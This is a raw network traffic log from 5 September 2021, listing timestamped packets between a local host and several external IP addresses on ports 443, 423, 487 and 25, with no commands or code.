Sep 5, 2021 15:50:21.721324921 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.721343994 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.721410036 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.721641064 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.726453066 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.726476908 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.726488113 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.726500988 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.726516962 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.726535082 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.726574898 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.726598978 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.726850033 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.731623888 CEST	423	49840	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:21.731646061 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.731657982 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.731722116 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.731863022 CEST	49840	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:21.731941938 CEST	49837	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.732439041 CEST	49842	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.732603073 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.732614040 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.732620001 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.732672930 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.732825994 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.733316898 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.733334064 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.733377934 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.733525991 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.734925985 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.734941959 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.734991074 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.735157967 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.736660957 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.736680031 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.736695051 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.736710072 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.736722946 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.736757994 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.736949921 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.740504026 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.740526915 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.740607977 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.740834951 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.741740942 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.741759062 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.741821051 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.741986036 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.747243881 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.747267008 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.747282028 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.747306108 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.747323990 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.747334957 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.747350931 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.747407913 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.747639894 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.755752087 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.755774021 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.755789042 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.755805969 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.755842924 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.755893946 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.756108999 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.756161928 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.756177902 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.756222010 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.757855892 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.757874966 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.757947922 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.759648085 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.759668112 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.759741068 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.759744883 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.759761095 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.759814024 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.763135910 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.763230085 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.763277054 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.764200926 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.764221907 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.764235020 CEST	423	49842	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.764246941 CEST	423	49837	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.764293909 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.764339924 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.764355898 CEST	49837	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.764372110 CEST	49842	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.764494896 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.764539957 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.765983105 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.766000986 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.766057014 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.767240047 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.767358065 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.767400026 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.768502951 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.768630981 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.768671989 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.769900084 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.770028114 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.770076036 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.771024942 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.771164894 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.771213055 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.772304058 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.772324085 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.772366047 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.773534060 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.773556948 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.773597002 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.774744034 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.774768114 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.774813890 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.775386095 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.775407076 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.775453091 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.776146889 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.776168108 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.776206970 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.776741028 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.776762962 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.776798964 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.777425051 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.777446032 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.777484894 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.778089046 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.778114080 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.778156042 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.778790951 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.778810024 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.778853893 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.779452085 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.779473066 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.779515982 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.780586004 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.780616999 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.780654907 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.780874968 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.780894995 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.780926943 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.781517982 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.781539917 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.781583071 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.782634020 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.782650948 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.782700062 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.782942057 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.785290956 CEST	423	49839	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:21.788146973 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.788217068 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.788229942 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.788239002 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.788307905 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.788878918 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.788902998 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.788935900 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.789556026 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.789587975 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.789622068 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.790250063 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.790270090 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.790307999 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.790916920 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.790940046 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.790980101 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.791820049 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.791904926 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.792068958 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.792110920 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.792161942 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.792774916 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.792850018 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.792984962 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.793028116 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.793327093 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.793350935 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.793390989 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.794742107 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.794761896 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.794811964 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.795376062 CEST	423	49842	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.795521021 CEST	49842	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.795867920 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.795912027 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.795947075 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.797085047 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.797108889 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.797126055 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.797187090 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.798130989 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.798171997 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.798193932 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.798253059 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.799487114 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.799510002 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.799529076 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.799531937 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.799561977 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.800117970 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.800224066 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.800242901 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.800266981 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.801484108 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.801506042 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.801522017 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.801548958 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.801575899 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.805254936 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.805278063 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.805286884 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.805295944 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.805305004 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.805315018 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.805327892 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.805381060 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.805435896 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.805485964 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.806500912 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.806591988 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.807070971 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.808106899 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.808151007 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.808185101 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.808222055 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.808245897 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.809542894 CEST	423	49840	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:21.811911106 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.812015057 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.813307047 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.813397884 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.814193964 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.814265013 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.814301014 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.814426899 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.814454079 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.814496994 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.814608097 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.818980932 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.819142103 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.826376915 CEST	423	49842	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.827425003 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.827502966 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.839332104 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.850881100 CEST	49838	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.851545095 CEST	49843	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.863363981 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.863384008 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.863488913 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.864408970 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.864476919 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.864480019 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.864530087 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.864640951 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.864680052 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.869354010 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.869405031 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.869419098 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.869438887 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.869461060 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.869560957 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.869595051 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.876529932 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.876720905 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.876748085 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.877733946 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.878000975 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.879570007 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.879636049 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.883862972 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.883927107 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.885179996 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.885489941 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.886126995 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.890280962 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.890296936 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.890358925 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.890525103 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.893965006 CEST	423	49843	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.894041061 CEST	49843	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.894696951 CEST	423	49838	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.894754887 CEST	49838	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.898845911 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.934719086 CEST	423	49843	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.935075998 CEST	49843	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.935295105 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.935981989 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.936063051 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.940910101 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.941342115 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.941659927 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.960278034 CEST	49841	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.961097956 CEST	49844	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.975608110 CEST	423	49843	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.986244917 CEST	423	49841	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:21.986274958 CEST	423	49844	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:21.986388922 CEST	49841	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.986466885 CEST	49844	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.012034893 CEST	423	49844	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:22.012285948 CEST	49844	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.036986113 CEST	423	49844	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:22.085206032 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:22.085230112 CEST	49839	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:22.085820913 CEST	49845	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:22.157099962 CEST	423	49845	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:22.157253027 CEST	49845	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:22.159389019 CEST	423	49839	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:22.159480095 CEST	49839	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:22.210371017 CEST	49840	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:22.210431099 CEST	49842	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:22.211289883 CEST	49846	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:22.211764097 CEST	49847	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:22.227330923 CEST	423	49845	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:22.227576017 CEST	49845	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:22.241487980 CEST	423	49842	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:22.241602898 CEST	49842	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:22.243362904 CEST	423	49847	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:22.243463993 CEST	49847	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:22.275270939 CEST	423	49847	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:22.275543928 CEST	49847	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:22.277839899 CEST	423	49846	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:22.277978897 CEST	49846	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:22.288230896 CEST	423	49840	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:22.288347006 CEST	49840	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:22.297312975 CEST	423	49845	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:22.307207108 CEST	423	49847	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:22.331518888 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.344831944 CEST	423	49846	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:22.345155001 CEST	49846	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:22.399110079 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:22.400939941 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.401076078 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.409393072 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:22.411927938 CEST	423	49846	193.56.146.41	192.168.2.4
